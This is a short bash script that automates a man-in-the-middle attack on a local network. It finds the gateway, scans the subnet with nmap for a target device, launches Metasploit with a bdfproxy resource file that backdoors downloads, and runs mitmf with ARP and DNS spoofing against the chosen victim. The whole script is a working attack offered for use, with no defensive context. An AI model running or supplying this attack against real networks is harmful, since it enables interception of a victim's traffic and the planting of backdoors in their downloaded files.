#!/bin/bash
echo ~~Listing network interfaces \"ifconfig\"
ifconfig
read -p "~~Enter the network interface name that will be used: " interfaceName
echo $interfaceName selected
echo ~~Getting the network default gateway \"ip route | grep default\"
defGateway=`ip route | grep default | awk  '{print $3}'`
echo "~~Scanning for connected devices \"nmap -sn $defGateway/24\""
nmap -sn $defGateway/24
read -p "~~Enter target device IP: " ClientIP
cd
gnome-terminal --tab -e 'msfconsole –r bdfproxy_msf_resource.rc'
mitmf --arp --spoof --gateway $defGateway --target $ClientIP -i $interfaceName --dns




